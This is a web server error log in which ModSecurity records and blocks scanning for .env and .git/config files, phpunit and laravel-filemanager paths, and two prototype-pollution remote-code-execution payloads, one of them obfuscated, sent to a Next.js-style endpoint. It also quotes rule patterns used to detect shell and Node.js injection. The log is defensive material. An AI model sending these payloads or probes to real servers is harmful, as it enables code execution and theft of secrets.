[Thu Dec 18 13:32:47.419010 2025] [:error] [pid 813359] [client 54.224.163.42:45196] [client 54.224.163.42] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUP0b7jsQ2OAT5oMPR4uhwAAAAc"]
[Thu Dec 18 14:26:00.234432 2025] [:error] [pid 823330] [client 54.81.18.104:42760] [client 54.81.18.104] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUQA6IyAooBmXTvOdU11PQAAABA"]
[Thu Dec 18 14:26:00.234961 2025] [:error] [pid 823330] [client 54.81.18.104:42760] [client 54.81.18.104] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUQA6IyAooBmXTvOdU11PQAAABA"]
[Thu Dec 18 14:26:00.235860 2025] [:error] [pid 823330] [client 54.81.18.104:42760] [client 54.81.18.104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUQA6IyAooBmXTvOdU11PQAAABA"]
[Thu Dec 18 14:26:00.236026 2025] [:error] [pid 823330] [client 54.81.18.104:42760] [client 54.81.18.104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUQA6IyAooBmXTvOdU11PQAAABA"]
[Thu Dec 18 23:02:26.637174 2025] [:error] [pid 828109] [client 134.199.157.19:48248] [client 134.199.157.19] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUR58gsmzZ6b_pJ2zxSpUAAAAAU"]
[Thu Dec 18 23:02:26.637445 2025] [:error] [pid 828109] [client 134.199.157.19:48248] [client 134.199.157.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUR58gsmzZ6b_pJ2zxSpUAAAAAU"]
[Thu Dec 18 23:02:26.637654 2025] [:error] [pid 828109] [client 134.199.157.19:48248] [client 134.199.157.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUR58gsmzZ6b_pJ2zxSpUAAAAAU"]
[Thu Dec 18 23:02:27.102654 2025] [authz_core:error] [pid 828109] [client 134.199.157.19:48248] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Thu Dec 18 23:02:27.335580 2025] [authz_core:error] [pid 828109] [client 134.199.157.19:48248] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/laravel-filemanager
[Thu Dec 18 23:02:27.801586 2025] [:error] [pid 828109] [client 134.199.157.19:48248] [client 134.199.157.19] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUR58wsmzZ6b_pJ2zxSpVQAAAAU"]
[Thu Dec 18 23:02:28.501376 2025] [:error] [pid 828109] [client 134.199.157.19:48248] [client 134.199.157.19] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUR59AsmzZ6b_pJ2zxSpWAAAAAU"]
[Thu Dec 18 23:02:28.501624 2025] [:error] [pid 828109] [client 134.199.157.19:48248] [client 134.199.157.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUR59AsmzZ6b_pJ2zxSpWAAAAAU"]
[Thu Dec 18 23:02:28.501821 2025] [:error] [pid 828109] [client 134.199.157.19:48248] [client 134.199.157.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUR59AsmzZ6b_pJ2zxSpWAAAAAU"]
[Fri Dec 19 00:13:53.547358 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 00:13:53.547909 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 00:13:53.548520 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Rule 7f9c6e422e58 [id "932140"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "419"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 00:13:53.551314 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Warning. Pattern match "(?:(?:\\\\(|\\\\[)[a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]+(?:\\\\)|\\\\])[0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]*\\\\([a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s].*\\\\)|\\\\([\\\\s]*string[\\\\s]*\\\\)[\\\\s]*(?:\\"|'))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "504"] [id "933210"] [msg "PHP Injection Attack: Variable Function Call Found"] [data "Matched Data: ('return global.require')(); } catch(e) {} } if (!req) throw new Error('No require found'); var vm_code = \\x5c\\x5cu0067\\x5c\\x5cu006c\\x5c\\x5cu006f\\x5c\\x5cu0062\\x5c\\x5cu0061\\x5c\\x5cu006c[String.fromCharCode(66,117,102,102,101,114)].from('2866756e6374696f6e28726571756972652c2070726f6365737329207b20202072657475726e206576616c285c75303036375c75303036635c75303036665c75303036325c75303036315c75303036635b537472696e672e66726f6d43686172436f64652836362c3131372c3130322c3130322c3130312c313134295d2e66726f6..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-in [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 00:13:53.551564 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,11..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 00:13:53.551787 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,11..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 00:13:53.721517 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Rule 7f9c6e14d320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 00:13:53.721758 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Rule 7f9c6e142030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 00:13:53.733646 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 00:13:53.733891 2025] [:error] [pid 830988] [client 167.71.58.65:56372] [client 167.71.58.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=20,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 25, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUSKsTZJmbd0wb18dcVyJgAAAAA"]
[Fri Dec 19 04:00:27.184947 2025] [:error] [pid 835259] [client 204.76.203.25:48370] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUS_y7vzcvi779v-NHWN-AAAAAY"]
[Fri Dec 19 04:00:27.185221 2025] [:error] [pid 835259] [client 204.76.203.25:48370] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUS_y7vzcvi779v-NHWN-AAAAAY"]
[Fri Dec 19 04:00:27.185387 2025] [:error] [pid 835259] [client 204.76.203.25:48370] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUS_y7vzcvi779v-NHWN-AAAAAY"]
[Fri Dec 19 19:49:52.326168 2025] [:error] [pid 842793] [client 134.199.164.161:19156] [client 134.199.164.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUWeUN0gNgrzumDf_nEYDwAAAA8"]
[Fri Dec 19 19:49:52.326442 2025] [:error] [pid 842793] [client 134.199.164.161:19156] [client 134.199.164.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUWeUN0gNgrzumDf_nEYDwAAAA8"]
[Fri Dec 19 19:49:52.326605 2025] [:error] [pid 842793] [client 134.199.164.161:19156] [client 134.199.164.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUWeUN0gNgrzumDf_nEYDwAAAA8"]
[Fri Dec 19 19:49:52.793937 2025] [authz_core:error] [pid 842793] [client 134.199.164.161:19156] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Fri Dec 19 19:49:53.026529 2025] [authz_core:error] [pid 842793] [client 134.199.164.161:19156] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/laravel-filemanager
[Fri Dec 19 19:49:53.494576 2025] [:error] [pid 842793] [client 134.199.164.161:19156] [client 134.199.164.161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUWeUd0gNgrzumDf_nEYFAAAAA8"]
[Fri Dec 19 19:49:54.198218 2025] [:error] [pid 842793] [client 134.199.164.161:19156] [client 134.199.164.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUWeUt0gNgrzumDf_nEYFwAAAA8"]
[Fri Dec 19 19:49:54.199268 2025] [:error] [pid 842793] [client 134.199.164.161:19156] [client 134.199.164.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUWeUt0gNgrzumDf_nEYFwAAAA8"]
[Fri Dec 19 19:49:54.199494 2025] [:error] [pid 842793] [client 134.199.164.161:19156] [client 134.199.164.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUWeUt0gNgrzumDf_nEYFwAAAA8"]
